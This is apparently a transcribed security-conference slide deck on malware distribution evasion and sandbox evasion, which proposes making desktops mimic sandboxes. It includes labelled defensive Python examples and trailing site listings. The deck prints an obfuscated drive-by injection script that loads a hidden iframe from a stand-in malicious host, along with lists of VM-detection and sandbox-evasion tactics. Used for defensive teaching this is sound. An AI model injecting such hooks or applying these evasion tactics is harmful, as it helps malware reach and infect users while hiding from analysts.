Thinking Outside the [Sand]box
Kyle Adams - Juniper Networks

This presentation is for educational purposes only
Introduction
Chief Software Architect for Junos Web App Secure
“Junos Web App Secure is a security deception technology
designed to lace web applications with honeypots on-the-fly”

More recently, leading efforts in malware research.
Can’t share exactly why, but I can share some interesting ideas that have surfaced as a result.
Primary Goal
Inoculate your machine from infection by specific classes of malware
Background
• Malware Analysis Background
  o Malware Collection Techniques
  o Malware Analysis Techniques
  o Signature Development
• Malware Authoring ROI
  o Malware ROI
  o Optimizing for Success
  o Hypothetical Example
• Evasion
  o Distribution Evasion
  o Sandbox Evasion
Background / Malware Collection
How do analysts get malware samples?
• Web Crawlers
• Torrents
• Usenet
• Malware Repositories
• Email
• Droppers
Background / Malware Analysis
How do malware analysts inspect malware?
• Static File Analysis
• Virtual Machine Sandboxing
• Code Emulation Sandboxing
Background / Signatures
How do malware signatures get created?
1. Get a sample
2. Analyze it for unique behaviors
   - Generate heuristic behavior signature
3. Analyze it for unique data patterns
   - Generate file data signature
4. Distribute new signatures to customers
5. Remove old unnecessary signatures
Background / Malware ROI
Uninterrupted Lifecycle:
Research → Development → Testing → Distribution → Grow Infection Base

The infection base grows indefinitely. The more machines infected, the more return the attacker gets for their initial investment.
In other words… Time = Money
Background / Malware ROI
Interrupted Lifecycle:
Research → Development → Testing → Distribution → Grow Infection Base → Sample Collected → Sample Detected → Signature Published

The infection base grows until a signature is published. It then rapidly declines in growth rate and eventually becomes negligible. The more machines infected, the more return the attacker gets for their initial investment.
So… Time to DETECTION = Money
Background / Optimizing For Success
Hypothetical Example:
Bob spends 20 hours researching his target environment, and another 20 hours writing some ransomware and testing it. Finally, Bob pays someone to distribute his malware for 50 cents per infection, with a distribution rate of 200 clients per hour.
Bob’s ransom is $300 and 10% of his victims will choose to pay.
So for every hour Bob’s malware is undetected, he makes:
((200 clients * 0.1) * $300) - (200 clients * $0.50) = $5,900 per hour

Assume the infection rate remains constant for 72 hours; after subtracting Bob’s time (~$50 an hour), Bob makes a total of $422,800.
Background / Optimizing For Success
Hypothetical Example:
Now assume his malware is detected and a signature is published, dropping the successful ransom collection rate to 1 client per hour.
(hours_before_detection * (((200 clients * 0.1) * $300) - (200 clients * $0.50)))
+ (hours_after_detection * (((10 clients * 0.1) * $300) - (10 clients * $0.50)))

Detection at 6 hours: Bob makes $52,870
Detection at 12 hours: Bob makes $88,500
Detection at 18 hours: Bob makes $120,130
Detection at 24 hours: Bob makes $153,760
So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770.
That’s a lot of motivation!
Background / Distribution Evasion
• You can’t analyze something you can’t get.
• You can’t generate signatures if you can’t analyze.

So if you can avoid serving malware to analysis labs, you can avoid detection and signature distribution.
Distribution Evasion
Distribute malware only to a select set of targets, narrow enough to exclude analysis labs.
Background / Distribution Evasion
Distribution Evasion Tactics:
• Don’t serve to search engines (Google, Yahoo, Bing, etc…)
• Don’t serve to known security lab IPs (Symantec, McAfee, etc…)
• Don’t serve to an environment you can’t infect (Missing Plugins, Unsupported OS, etc…)
• Randomly choose not to serve
• Serve only to specific countries/IP ranges
• Serve only to known browsers
• Serve only if referer is whitelisted
• Serve only once per IP
Background / Distribution Evasion
Distribution Evasion Implementation:
1. Inject obfuscated drive-by download hook into compromised sites:
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('<0 8="7/a">6 2="4://5.9.f";b.g("<3 e="1" d="1"c=""+2+""></3>");</0>',17,17,
'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|width|com|write'.split('|'),0,{}))</script>

Deobfuscated, it looks like this:
<script type="text/javascript">
var ste = "http://exmpl.badness.ru/loader.php?key=Ah7Bvv034";
document.write("<iframe width=\"1\" height=\"1\" src=\"" + ste + "\"></iframe>");
</script>

But this does nothing to stop automated crawlers in a research lab.
Background / Distribution Evasion
Distribution Evasion Implementation:
2. Add client-side specificity: The malware requires a specific version of Flash to exploit a client, so the drive-by code can actually hide itself unless you have that version of Flash.
<script type="text/javascript">

… encryption/decryption code …
eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b4718585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c4042584451191b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b17141e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave Flash'].version));
</script>

Now if the lab isn’t using flash version 12.0.0.44, the drive-by iframe will not
Background / Distribution Evasion
Distribution Evasion Implementation:
3. Add server-side specificity and filtering: The iframe points to a server whose sole purpose is to exploit browsers and serve malware. In addition to picking the right exploit for the target client, it will also not serve malware if specific conditions are not met:
• You’re not a search engine
• Your IP is not blacklisted, or is in a whitelist
• You’re using an exploitable OS and browser
• This is the first time you have loaded the iframe
• Drive-by code has been injected into the domain of your referer

Since the research lab doesn’t know what conditions the distribution server requires, it is exceptionally difficult to trick it into serving the malware.
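Two of the tells in steps 1 and 2, the packer wrapper and the decrypt call keyed on the client’s plugin version, are visible in the page source a browser or lab crawler receives. The Python below is an added example, not code from the talk: it reverses the widely used "p,a,c,k,e,d" packer wrapper that the slide’s hook uses (the payload and word list are copied from the slide, and the wrapper is a plain word-for-word substitution), and it scans page text for three indicators, unpacking any wrapper it finds first so the 1x1 iframe the hook would write becomes visible. The regexes, indicator names and the sample pages (`PACKED_HOOK_PAGE`, `KEYED_DECRYPT_PAGE`, `BENIGN_PAGE`) are constructed for this example.

```python
import re

# Added example; not code from the presentation. The "p,a,c,k,e,d" packer
# replaces every identifier in payload p with a base-a token and ships the
# original words in k, so unpacking is one substitution pass.


def to_radix(n, radix):
    """Mirror of JavaScript's Number.prototype.toString(radix) for radix <= 36."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = ""
    while True:
        n, r = divmod(n, radix)
        out = digits[r] + out
        if n == 0:
            return out


def unpack(p, a, c, k):
    """Reverse the packer: map each token back to k[token]. A token with an
    empty dictionary entry stands for itself (the literal 1 in width="1")."""
    if a > 36:
        raise ValueError("radix above 36 uses a different token alphabet; not handled here")
    table = {}
    for i in range(c):
        tok = to_radix(i, a)
        table[tok] = k[i] if i < len(k) and k[i] else tok
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p, flags=re.ASCII)


# Payload and dictionary exactly as printed on the slide.
SLIDE_PAYLOAD = '<0 8="7/a">6 2="4://5.9.f";b.g("<3 e="1" d="1"c=""+2+""></3>");</0>'
SLIDE_WORDS = ("script||ste|iframe|http|www|var|text|type|google|javascript|"
               "document|src|height|width|com|write").split("|")

# Pulls the packer's call arguments out of page text: }('payload',a,c,'words'.split('|')
PACKER_CALL = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*"
    r"'((?:[^'\\]|\\.)*)'\s*\.split\(\s*'\|'\s*\)", re.S)

INDICATORS = {
    # the packer wrapper itself, as injected into compromised pages
    "packer_wrapper": re.compile(r"eval\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)"),
    # a 1x1 iframe, with or without backslash-escaped quotes (inside document.write)
    "pixel_iframe": re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*\\?[\"']?1\\?[\"']", re.I),
    # a blob decrypted with a key taken from the client's plugin inventory
    "plugin_keyed_decrypt": re.compile(r"eval\(\s*decrypt\(.*?navigator\.plugins", re.S),
}


def _unescape_js_single_quoted(s):
    # Only \' and \\ occur in packer output; a full JS string decoder is not needed here.
    return re.sub(r"\\(.)", r"\1", s)


def scan_html(html):
    """Return the sorted names of indicators present in a page. Any packer call
    is unpacked first, so the iframe it would write is checked even though it
    never appears literally in the page source."""
    text = html
    for m in PACKER_CALL.finditer(html):
        payload = _unescape_js_single_quoted(m.group(1))
        words = _unescape_js_single_quoted(m.group(4)).split("|")
        text += "\n" + unpack(payload, int(m.group(2)), int(m.group(3)), words)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


# Constructed sample pages. The wrapper body is elided in the first one; the
# scanner keys on the wrapper's signature and on the call arguments.
PACKED_HOOK_PAGE = (
    '<html><body><p>news</p><script type="text/javascript">'
    "eval(function(p,a,c,k,e,d){/* packer body as on the slide */}"
    f"('{SLIDE_PAYLOAD}',17,17,'{'|'.join(SLIDE_WORDS)}'.split('|'),0,{{}}))"
    "</script></body></html>")
KEYED_DECRYPT_PAGE = (
    '<script type="text/javascript">eval(decrypt("4f5345...", '
    "navigator.plugins['Shockwave Flash'].version));</script>")
BENIGN_PAGE = ('<html><body><iframe src="https://video.example.test/embed/42" '
               'width="640" height="360"></iframe></body></html>')

if __name__ == "__main__":
    print(unpack(SLIDE_PAYLOAD, 17, 17, SLIDE_WORDS))
    for name, page in [("packed hook", PACKED_HOOK_PAGE),
                       ("keyed decrypt", KEYED_DECRYPT_PAGE), ("benign", BENIGN_PAGE)]:
        print(f"{name}: {scan_html(page)}")
```

Unpacking the slide’s own blob yields a `document.write` of a 1x1 iframe pointing at www.google.com (the speaker sanitised the URL in the packed copy), which is exactly what `pixel_iframe` catches; the keyed-decrypt indicator can only flag the pattern, since the blob stays opaque without the exact Flash version it was keyed to.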
Background / Sandbox Evasion
Sandbox Evasion Tactics:
If any of the following are true, do not execute the malware payload:
• Significant Clock Skew
• Debugger is attached
• Virtual Machine Detected
• No Internet Connection
• Unexploitable environment
• Sandbox Software Detected
• Sleep statements abort prematurely

Sandboxes can only run for a fixed period of time per sample (usually 30-60 seconds), so the malware may try to run longer:
• Long sleep before payload execution
• Schedule payload execution for some time in the future
Background / Sandbox Evasion
Sandbox evasion techniques can be grouped into several high level categories:
• Specificity
• Triggers
• Detection
• Interruption
• Dialogs

Any given malware sample may do zero or more of these.
Background / Sandbox Evasion
Specificity:
• Has internet connection
• Has correct software versions
• Has correct OS
• Has expected security policies
• Public IP is in correct geographical region
• Clock skew is minimal
• Account data is present (Gmail, AIM, Facebook, etc…)
Background / Sandbox Evasion
Specificity:
• Requires Email Handling app like Outlook or ThunderBird.
• Requires Internet Connection
• Requires .NET framework
• Requires Win 95/98
Background / Sandbox Evasion
Triggers:
• Sleep for several minutes
• Require multiple executions
• Wait for one or more reboots
• Wait for event
  o User opens .txt file
  o User launches browser
  o User switches to battery power
  o User updates windows
  o User installs software
  o User connects to WiFi
  o HID activity (Mouse, Keyboard, Webcam, Mic)
Background / Sandbox Evasion
Triggers:
Requires browser restart to trigger payload.
Require a second execution.
Background / Sandbox Evasion
Detection:
• Debugger Hooks
• Virtual Machines
  o Registry Keys, Serial Numbers, MAC addresses
  o Processes, Services, Drivers, Open Ports
  o VM Specific ASM instructions
• Sandbox Software
  o Open Ports, Processes, Files
Background / Sandbox Evasion
Detection:
Themida: Legitimate software piracy protection wrapper designed to detect VMs and debuggers. Go figure, malware authors use it too.
Debugger detection. And hey, they even explained how to turn off SoftIce (just in case you didn’t know how).
No Printer?
Background / Sandbox Evasion
Interruption:
• Analysis Framework Interruption
  o Force Reboot or Logout
  o Enable Firewall / Whitelist C&C servers
• Screen Capture Interruption
  o Open dialogs minimized
  o Open other apps maximized
  o Flashing components / Animation
  o Hidden MouseOver components
Background / Sandbox Evasion
Interruption:
Force a reboot.

Screen Shot Evasion:
The “Play” button flashes. We got lucky and took the screenshot at the right time.
Background / Sandbox Evasion
Dialogs:
Background / Sandbox Evasion
Simple Dialogs:
What are they?
• Fake Apps
  o Fake Installers
  o Fake Errors
• Why?
  o Prevent sandbox analysis
  o Phish for information
  o Legitimize
     it looks real, so it’s probably safe
     red flags (UAC, firewall notices, etc…)
Background / Sandbox Evasion
Simple Dialogs:
Legitimize UAC dialogs

Require basic human input (click a button)
Background / Sandbox Evasion
Advanced Dialogs:
• Require account details
• TOS acceptance
• Combination Lock
• Graphic based dialogs
Background / Sandbox Evasion
Advanced Dialogs:
Requires password. Presumably available with the download link.
Captcha style dialog.
Fake dialog. This dialog looks similar to the default theme of XP, but is clearly not.
Deceptive Inoculation
Bottom line, malware takes great care not to run in a sandbox environment.

Let’s all be sandboxes!
(or at least pretend to be)
Deceptive Inoculation
• Distribution Deception
  o Prevent your personal computer from being sent malware in the first place (stop drive-by-downloads).
• Sandbox Deception
  o Prevent malware from executing a payload when launched on your personal computer.
Inoculation / Distribution Evasion
Pretend you’re Googlebot:
1. Firefox: Install User-Agent-Switcher
2. Set User-Agent to: Googlebot-Image (Googlebot)

Pretend none of your plugins are enabled:
1. Firefox: Go to Tools > Add Ons
2. For everything in the list, select “Ask To Activate”
(Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...)

Disable Referers:
1. Firefox: Go to about:config
2. Set “network.http.sendRefererHeader” to 0
Inoculation / Distribution Evasion
Request Suspicious Content Twice:
This doesn’t exist yet, but what if….
[Diagram: an IFRAME VALIDATOR sits between the browser and the servers and requests each framed URL twice]
iframe: badsite.com → Bad Server → embedded flash
repeat: badsite.com → Bad Server → no embedded flash
iframe: goodsite.com → Good Server → no embedded flash
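The validator in the diagram can be sketched in a few lines. The Python below is an added example, not part of the talk: `IframeValidator` fetches a framed URL twice as the same client and blocks the frame when the active content (object, embed, applet and iframe tags) differs between the two fetches. `FakeBadServer` (serves its exploit object once per IP, the "serve only once per IP" tactic from the earlier slide) and `FakeGoodServer` (the same player every time, behind a changing request counter) are constructed stand-ins for the diagram’s two servers, and the `fetch(url, client_ip)` signature is the example’s own assumption. It goes slightly beyond the diagram in that the good server also carries active content, to show that the comparison is on what changes, not on whether Flash is present.

```python
import re
from collections import Counter

# Added example; not code from the presentation. Servers and fetch() are
# constructed stand-ins for the diagram's Bad Server / Good Server.

ACTIVE_CONTENT = re.compile(r"<(object|embed|applet|iframe)\b", re.I)


def active_content_profile(html):
    """Reduce a page to the multiset of active-content tags it carries.
    Comparing profiles instead of raw bytes keeps a changing timestamp or a
    rotating ad from looking like evasive behaviour."""
    return Counter(tag.lower() for tag in ACTIVE_CONTENT.findall(html))


class IframeValidator:
    """Fetches a framed URL twice, as the same client, before the browser sees
    it. A distribution server that serves its exploit only once per IP returns
    two different pages, so the frame is refused; a normal site returns the same
    active content both times and is passed through."""

    def __init__(self, fetch):
        self.fetch = fetch  # callable(url, client_ip) -> html text (assumed signature)

    def check(self, url, client_ip):
        first = active_content_profile(self.fetch(url, client_ip))
        second = active_content_profile(self.fetch(url, client_ip))
        verdict = "allow" if first == second else "block"
        return verdict, first, second


class FakeBadServer:
    """Constructed 'Bad Server': an exploit object on the first request from an
    IP (the 'serve only once per IP' tactic), an empty page afterwards."""

    def __init__(self):
        self.seen = set()

    def fetch(self, url, client_ip):
        if client_ip in self.seen:
            return "<html><body></body></html>"
        self.seen.add(client_ip)
        return ('<html><body><object type="application/x-shockwave-flash" '
                'data="/loader.swf"></object></body></html>')


class FakeGoodServer:
    """Constructed 'Good Server': the same embedded player every time, with a
    request counter that makes the raw bytes differ between fetches."""

    def __init__(self):
        self.requests = 0

    def fetch(self, url, client_ip):
        self.requests += 1
        return (f"<html><body><p>request #{self.requests}</p>"
                '<embed src="/player.swf" type="application/x-shockwave-flash">'
                "</body></html>")


def validate_both():
    """Run the validator against both constructed servers; returns the two verdicts."""
    bad = IframeValidator(FakeBadServer().fetch).check("http://badsite.example/frame", "203.0.113.7")
    good = IframeValidator(FakeGoodServer().fetch).check("http://goodsite.example/frame", "203.0.113.7")
    return bad[0], good[0]


if __name__ == "__main__":
    print(validate_both())  # ('block', 'allow')
```

The validator has to be the party making the first request: a server keyed on "first time you have loaded the iframe" hands its exploit to whoever asks first, so the browser must never see either response until both have been compared. A server that randomly chooses not to serve (another tactic listed earlier) would be caught on some pairs of fetches and missed on others, so this is a filter that raises the attacker’s cost, not a guarantee.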
Inoculation / Sandbox Evasion
Permanent Debugger:
1. Install a debugger
2. Hook every process automatically

Spoof VMware Artifacts:
1. Create stub exe called “VBoxService.exe” and leave it running on boot.

Skew your clock:
1. Change system time to be 1 year behind
2. Disable clock syncing
Inoculation / Sandbox Evasion
Sandbox Emulation:
1. Open ports (cuckoo: 2042, mongodb: 27017)
2. Configure as Cuckoo Guest: http://docs.cuckoosandbox.org/en/latest/installation/guest/
   But make sure to cripple the agent!

These changes may result in instability of the system, and would require some additional testing in a well-used desktop environment.

1. Add a dll named “dbghelp.dll” to registry so it loads into every process
2. Temporarily assign Windows product ID of “76487-337-8429955-22614” (assign on boot, revert on shutdown)
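Step 1 of the sandbox emulation, opening the ports a Cuckoo guest would have, can be done with a plain socket listener. The Python below is an added example, not from the talk: `DecoyListener` binds a port, accepts connections and hangs up without speaking, so a port probe sees the sandbox tell but nothing behind the port can be driven, which is the "crippled agent" the slide asks for. The 2042 and 27017 port numbers are the ones the slide names; binding to 127.0.0.1 and the class and function names are the example’s own choices.

```python
import socket
import threading
import time

# Added example; not code from the presentation. Ports are the ones the slide
# names as sandbox tells; loopback binding is this example's default.
SANDBOX_TELL_PORTS = {2042: "cuckoo", 27017: "mongodb"}


class DecoyListener:
    """A TCP listener that accepts connections and immediately hangs up.

    To a port probe the port looks open, as it would on a real sandbox guest,
    but there is no agent behind it to drive (the 'crippled agent')."""

    def __init__(self, port, label, host="127.0.0.1"):
        self.label = label
        self.accepted = 0
        self._stop = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.sock.settimeout(0.2)  # lets the serve loop notice close()
        self.host, self.port = self.sock.getsockname()[:2]  # real port when port=0
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            self.accepted += 1
            conn.close()  # say nothing, hang up

    def wait_for_connections(self, n, timeout=2.0):
        """Block until n connections have been accepted, or the timeout expires."""
        deadline = time.monotonic() + timeout
        while self.accepted < n and time.monotonic() < deadline:
            time.sleep(0.01)
        return self.accepted >= n

    def close(self):
        self._stop.set()
        self._thread.join()
        self.sock.close()


def port_looks_open(host, port, timeout=1.0):
    """What a probing process observes: does a TCP connect to host:port succeed?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def start_decoys(ports=SANDBOX_TELL_PORTS, host="127.0.0.1"):
    """Start one decoy per port. A port already in use is skipped and reported,
    since a real service there would be disturbed by a decoy."""
    started, skipped = [], []
    for port, label in ports.items():
        try:
            started.append(DecoyListener(port, label, host))
        except OSError as exc:
            skipped.append((port, label, str(exc)))
    return started, skipped


if __name__ == "__main__":
    decoys, skipped = start_decoys()
    for d in decoys:
        print(f"decoy {d.label} listening on {d.host}:{d.port}")
    for port, label, why in skipped:
        print(f"skipped {label} on port {port}: {why}")
    try:
        while decoys:
            time.sleep(60)
    except KeyboardInterrupt:
        for d in decoys:
            d.close()
```

The skip-if-in-use behaviour matters on a real desktop: if a genuine MongoDB is already on 27017 the decoy must stand aside, which is the kind of interaction the slide’s instability warning points at.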

Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The
Conclusion
Practicality:
As it stands, these techniques require some complex administrative/programming tasks, and would need to be updated regularly.
Ideally these types of techniques could be packaged into software that automatically updates and manages settings for you.
Conclusion
Perceived Efficacy:
With just these 5 strategies, we were able to prevent 20% of malware activity in the samples we analyzed.

True Efficacy:
Hard to say how effective it really is, because the samples this works on are less likely to be identified as known malware.
Fortunately, this means it will reduce malware infection for samples your AV is unlikely to detect with signatures.
More Information
Contact Info:
Email: kadams@juniper.net
Twitter: kadams_sec

LinkedIn:
https://www.linkedin.com/in/adamsk

Presentation Material:
http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow

References: http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-awaremalware.html

 
Smart Solutions for Smart Communities: What's Next & Who's Responsible?
Smart Solutions for Smart Communities: What's Next & Who's Responsible?Smart Solutions for Smart Communities: What's Next & Who's Responsible?
Smart Solutions for Smart Communities: What's Next & Who's Responsible?Juniper Networks
 
Are You Ready for Digital Cohesion?
Are You Ready for Digital Cohesion?Are You Ready for Digital Cohesion?
Are You Ready for Digital Cohesion?Juniper Networks
 
Juniper vSRX - Fast Performance, Low TCO
Juniper vSRX - Fast Performance, Low TCOJuniper vSRX - Fast Performance, Low TCO
Juniper vSRX - Fast Performance, Low TCOJuniper Networks
 
SDN and NFV: Transforming the Service Provider Organization
SDN and NFV: Transforming the Service Provider OrganizationSDN and NFV: Transforming the Service Provider Organization
SDN and NFV: Transforming the Service Provider OrganizationJuniper Networks
 
Navigating the Uncertain World Facing Service Providers - Juniper's Perspective
Navigating the Uncertain World Facing Service Providers - Juniper's PerspectiveNavigating the Uncertain World Facing Service Providers - Juniper's Perspective
Navigating the Uncertain World Facing Service Providers - Juniper's PerspectiveJuniper Networks
 
vSRX Buyer’s Guide infographic - Juniper Networks
vSRX Buyer’s Guide infographic - Juniper Networks vSRX Buyer’s Guide infographic - Juniper Networks
vSRX Buyer’s Guide infographic - Juniper Networks Juniper Networks
 
NFV Solutions for the Telco Cloud
NFV Solutions for the Telco Cloud NFV Solutions for the Telco Cloud
NFV Solutions for the Telco Cloud Juniper Networks
 
Juniper SRX5800 Infographic
Juniper SRX5800 InfographicJuniper SRX5800 Infographic
Juniper SRX5800 InfographicJuniper Networks
 
Infographic: 90% MetaFabric Customer Satisfaction
Infographic: 90% MetaFabric Customer SatisfactionInfographic: 90% MetaFabric Customer Satisfaction
Infographic: 90% MetaFabric Customer SatisfactionJuniper Networks
 
Infographic: Whack Hackers Lightning Fast
Infographic: Whack Hackers Lightning FastInfographic: Whack Hackers Lightning Fast
Infographic: Whack Hackers Lightning FastJuniper Networks
 
High performance data center computing using manageable distributed computing
High performance data center computing using manageable distributed computingHigh performance data center computing using manageable distributed computing
High performance data center computing using manageable distributed computingJuniper Networks
 

More from Juniper Networks (20)

Why Juniper, Driven by Mist AI, Leads the Market
 Why Juniper, Driven by Mist AI, Leads the Market Why Juniper, Driven by Mist AI, Leads the Market
Why Juniper, Driven by Mist AI, Leads the Market
 
Experience the AI-Driven Enterprise
Experience the AI-Driven EnterpriseExperience the AI-Driven Enterprise
Experience the AI-Driven Enterprise
 
How AI Simplifies Troubleshooting Your WAN
How AI Simplifies Troubleshooting Your WANHow AI Simplifies Troubleshooting Your WAN
How AI Simplifies Troubleshooting Your WAN
 
Real AI. Real Results. Mist AI Customer Testimonials.
Real AI. Real Results. Mist AI Customer Testimonials.Real AI. Real Results. Mist AI Customer Testimonials.
Real AI. Real Results. Mist AI Customer Testimonials.
 
SD-WAN, Meet MARVIS.
SD-WAN, Meet MARVIS.SD-WAN, Meet MARVIS.
SD-WAN, Meet MARVIS.
 
Are you able to deliver reliable experiences for connected devices
Are you able to deliver reliable experiences for connected devicesAre you able to deliver reliable experiences for connected devices
Are you able to deliver reliable experiences for connected devices
 
Stop Doing These 5 Things with Your SD-WAN
Stop Doing These 5 Things with Your SD-WANStop Doing These 5 Things with Your SD-WAN
Stop Doing These 5 Things with Your SD-WAN
 
Securing IoT at Scale Requires a Holistic Approach
Securing IoT at Scale Requires a Holistic ApproachSecuring IoT at Scale Requires a Holistic Approach
Securing IoT at Scale Requires a Holistic Approach
 
Smart Solutions for Smart Communities: What's Next & Who's Responsible?
Smart Solutions for Smart Communities: What's Next & Who's Responsible?Smart Solutions for Smart Communities: What's Next & Who's Responsible?
Smart Solutions for Smart Communities: What's Next & Who's Responsible?
 
What's Your IT Alter Ego?
What's Your IT Alter Ego?What's Your IT Alter Ego?
What's Your IT Alter Ego?
 
Are You Ready for Digital Cohesion?
Are You Ready for Digital Cohesion?Are You Ready for Digital Cohesion?
Are You Ready for Digital Cohesion?
 
Juniper vSRX - Fast Performance, Low TCO
Juniper vSRX - Fast Performance, Low TCOJuniper vSRX - Fast Performance, Low TCO
Juniper vSRX - Fast Performance, Low TCO
 
SDN and NFV: Transforming the Service Provider Organization
SDN and NFV: Transforming the Service Provider OrganizationSDN and NFV: Transforming the Service Provider Organization
SDN and NFV: Transforming the Service Provider Organization
 
Navigating the Uncertain World Facing Service Providers - Juniper's Perspective
Navigating the Uncertain World Facing Service Providers - Juniper's PerspectiveNavigating the Uncertain World Facing Service Providers - Juniper's Perspective
Navigating the Uncertain World Facing Service Providers - Juniper's Perspective
 
vSRX Buyer’s Guide infographic - Juniper Networks
vSRX Buyer’s Guide infographic - Juniper Networks vSRX Buyer’s Guide infographic - Juniper Networks
vSRX Buyer’s Guide infographic - Juniper Networks
 
NFV Solutions for the Telco Cloud
NFV Solutions for the Telco Cloud NFV Solutions for the Telco Cloud
NFV Solutions for the Telco Cloud
 
Juniper SRX5800 Infographic
Juniper SRX5800 InfographicJuniper SRX5800 Infographic
Juniper SRX5800 Infographic
 
Infographic: 90% MetaFabric Customer Satisfaction
Infographic: 90% MetaFabric Customer SatisfactionInfographic: 90% MetaFabric Customer Satisfaction
Infographic: 90% MetaFabric Customer Satisfaction
 
Infographic: Whack Hackers Lightning Fast
Infographic: Whack Hackers Lightning FastInfographic: Whack Hackers Lightning Fast
Infographic: Whack Hackers Lightning Fast
 
High performance data center computing using manageable distributed computing
High performance data center computing using manageable distributed computingHigh performance data center computing using manageable distributed computing
High performance data center computing using manageable distributed computing
 

Recently uploaded

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
